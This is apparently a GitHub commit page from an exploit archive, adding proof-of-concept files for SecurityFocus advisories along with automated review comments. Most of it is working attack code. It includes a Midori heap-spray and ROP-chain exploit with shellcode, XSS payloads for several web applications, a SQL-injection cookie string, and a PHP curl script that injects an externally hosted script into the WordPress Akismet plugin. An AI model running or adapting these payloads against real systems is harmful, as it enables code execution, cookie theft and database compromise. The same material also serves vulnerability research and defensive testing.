35 new exploits
Offensive Security
committed
Aug 22, 2015
1 parent
6dccd55
commit 40a9571
Showing
36 changed files
with
2,207 additions
and
0 deletions.
@@ -0,0 +1,132 @@ | ||
source: http://www.securityfocus.com/bid/55709/info | ||
|
||
The Midori Browser is prone to a denial-of-service vulnerability. | ||
|
||
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. | ||
|
||
Midori Browser 0.3.2 is vulnerable; other versions may also be affected. | ||
|
||
|
||
it**************************** | ||
|
||
<html> | ||
<!-- ROP completed---> | ||
<head> | ||
<Title>Ubuntu 11.10 Calc p47l0d -- Rop Completed</title> | ||
<script type="text/javascript"> | ||
function ignite() { | ||
var carpet = 0x200; | ||
var vftable = unescape("\x00% u0c10"); | ||
var pLand = "% u00fd% u0c10"; | ||
var pShell = "% u0000% u0c10"; | ||
var oldProt = "% u0000% u0c10"; | ||
|
||
var heap = unescape("% u0101% u0102" | ||
+"% u0008% u0c10" | ||
+"% u0105% u0106" | ||
+"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret | ||
+"% u0109% u010a"// | ||
+"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi] | ||
+"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret | ||
+"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret | ||
+"% u0000% u0c10"//% u0112% u0113" // will be popped in edx // | ||
+"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50] | ||
+pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly | ||
+"% ue8d4% u6d7f"//"% u0118% u0119" // mov [ecx],eax;pop ebp;ret | ||
+"% u011a% u011b"// will be popped in ebp | ||
+"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret | ||
+"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret | ||
+oldProt//"% u0124% u0125" // pOldProtection | ||
+"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret | ||
+"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase. | ||
+"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret | ||
+"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret | ||
+"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret | ||
+"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE | ||
+"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret | ||
+"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret | ||
+"% u013a% u013b"// will be popped in ebp | ||
+"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret | ||
|
||
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret | ||
+"% u0000% u0010"//"% u0146% u0147" // Size | ||
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret | ||
+"% u014a% u014b"// Will be popped in ebp. | ||
+"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret | ||
|
||
+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret | ||
+pShell//"% u0146% u0147" // Address Of Shellcode block to change protection. | ||
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret | ||
+"% u014a% u014b"// Will be popped in ebp. | ||
/* +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret | ||
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret | ||
*/ +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret | ||
+"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret | ||
+"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax | ||
+"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret | ||
+"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax. | ||
|
||
/* Need to fix the ebp for proper landing on shellcode */ | ||
+"% uc420% u6d99"// dec ebp;ret | ||
+"% uc420% u6d99"// dec ebp;ret | ||
+"% uc420% u6d99"// dec ebp;ret | ||
+"% uc420% u6d99"// dec ebp;ret | ||
|
||
|
||
+"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret | ||
+"% u0160% u0161" | ||
+"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect | ||
+"% u0164% u0165" | ||
+"% u0166% u0167" | ||
+"% u0168% u0169" | ||
+"% u016a% u016b" | ||
+"% u016c% u016d" | ||
) | ||
/* Shellcode : */ +unescape("% u9090% u9090% u9090% u9090" | ||
+"% u585b" // pop ebx;pop eax; | ||
+"% u0a05% u0a13% u9000" // add eax,0a130a | ||
+"% u008b" // mov eax,[eax] | ||
+"% u056a" // push 05 | ||
+"% uc581% u0128% u0000" // add ebp,114 | ||
+"% u9055" // push ebp;nop | ||
+"% u1505% u04d6% u9000" // add eax,4d615 | ||
+"% ud0ff" // call eax | ||
+"% uBBBB% uCCCC% uDDDD% uEEEE" | ||
/* command: */ +"% u6163% u636c% u652e% u6578% u0000% ucccc" // calc.exe | ||
); | ||
var vtable = unescape("\x04% u0c10"); | ||
while(vtable.length < 0x10000) {vtable += vtable;} | ||
var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2); | ||
while (heapblock.length<0x80000) {heapblock += heap+heapblock;} | ||
var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2); | ||
var spray = new Array(); | ||
for (var iter=0;iter<carpet;iter++){ | ||
spray[iter] = finalspray+heap; | ||
} | ||
/* vulnerability trigger : */ | ||
var arrobject = [0x444444444444]; | ||
for(;true;){(arrobject[0])++;} | ||
} | ||
</script> | ||
</head> | ||
<body> | ||
<applet src="test.class" width=10 height=10></applet> | ||
<input type=button value="Object++" onclick="ignite()" /> | ||
</body> | ||
</html> | ||
|
||
********************Exploit**************************** | ||
|
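Review bot: The advisory text at the top of this section describes a denial of service (a crash), but the body of `ignite()` is a heap spray followed by a hard-coded ROP chain and shellcode, and the `<title>` names Ubuntu 11.10 while the payload's command string is `calc.exe`; the file as committed does not say which part actually reproduces BID 55709. Only the last two statements of `ignite()`, marked `/* vulnerability trigger : */`, are the unbounded `(arrobject[0])++` loop the advisory's crash presumably comes from, so the rest appears to be scaffolding the DoS reproduction does not need. A header comment such as `<!-- BID 55709 DoS: the crash is the infinite increment loop at the end of ignite(); the spray/ROP block above it is not part of the crash reproduction described by the advisory -- TODO confirm its origin -->` would bring the file in line with its description. The `it****` line just above `<html>` also looks like a truncated copy of the `********************Exploit****` marker that closes the file.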
@@ -0,0 +1,13 @@ | ||
source: http://www.securityfocus.com/bid/55740/info | ||
|
||
IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. | ||
|
||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user and conduct phishing attacks. Other attacks are also possible. | ||
|
||
IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable; other versions may also be affected. | ||
|
||
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie) | ||
|
||
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B | ||
|
||
http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua |
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/55689/info | ||
|
||
The ABC Test plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. | ||
|
||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. | ||
|
||
ABC Test 0.1 is vulnerable; other versions may also be affected. | ||
|
||
http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1 |
@@ -0,0 +1,25 @@ | ||
source: http://www.securityfocus.com/bid/55739/info | ||
|
||
Switchvox is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input. | ||
|
||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. | ||
|
||
Switchvox 5.1.2 vulnerable; other versions may also be affected. | ||
|
||
Review: Tools -> Sound Manager -> Create sound [Description] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Setup -> Groups -> Create Extension Group [Note] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note] | ||
PoC:<iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> | ||
|
||
Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note] | ||
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe> |
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/55746/info | ||
|
||
AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. | ||
|
||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. | ||
|
||
AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected. | ||
|
||
user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#; |
@@ -0,0 +1,37 @@ | ||
source: http://www.securityfocus.com/bid/55749/info | ||
|
||
The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. | ||
|
||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. | ||
|
||
#!/usr/bin/php -f | ||
<?php | ||
# | ||
# legacy.php curl exploit | ||
# | ||
|
||
// | ||
// HTTP POST, | ||
// | ||
|
||
$target = $argv[1]; | ||
|
||
$ch = curl_init(); | ||
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); | ||
curl_setopt($ch, CURLOPT_URL, | ||
"http://$target/wp-content/plugins/akismet/legacy.php"); | ||
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE | ||
5.01; Windows NT 5.0)"); | ||
curl_setopt($ch, CURLOPT_POST, 1); | ||
curl_setopt($ch, CURLOPT_POSTFIELDS, | ||
"s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E"); | ||
curl_setopt($ch, CURLOPT_TIMEOUT, 3); | ||
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); | ||
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); | ||
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); | ||
$buf = curl_exec ($ch); | ||
curl_close($ch); | ||
unset($ch); | ||
|
||
echo $buf; | ||
?> |
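Review bot: `$target = $argv[1];` is taken with no presence check and interpolated unchanged into both the request URL and the cookie-jar path `"/tmp/cookie_$target"`, so a missing argument produces `http:///wp-content/...` and a value containing `/` or `..` selects an arbitrary file under a shared, predictable `/tmp` name (the classic insecure temp-file pattern). `$buf = curl_exec ($ch);` is never checked, so a failed or timed-out request (`CURLOPT_TIMEOUT` is 3 seconds) makes `echo $buf;` print `false` as an empty string with no indication anything went wrong; `if ($buf === false) { fwrite(STDERR, curl_error($ch) . "\n"); }` before `curl_close($ch);` would surface it. The `CURLOPT_USERAGENT` value is shown split across two lines (`"Mozilla/4.0 (compatible; MSIE` / `5.01; Windows NT 5.0)"`); that may be a rendering artifact, but if literal it embeds a newline in a header value. A header comment such as `# NOTE: $argv[1] is used unvalidated in the URL and in the /tmp cookie-jar path; curl_exec failures are not reported` would at least document these limits for the archive.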
@@ -0,0 +1,9 @@ | ||
source: http://www.securityfocus.com/bid/55755/info | ||
|
||
Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. | ||
|
||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. | ||
|
||
Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected. | ||
|
||
http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C> |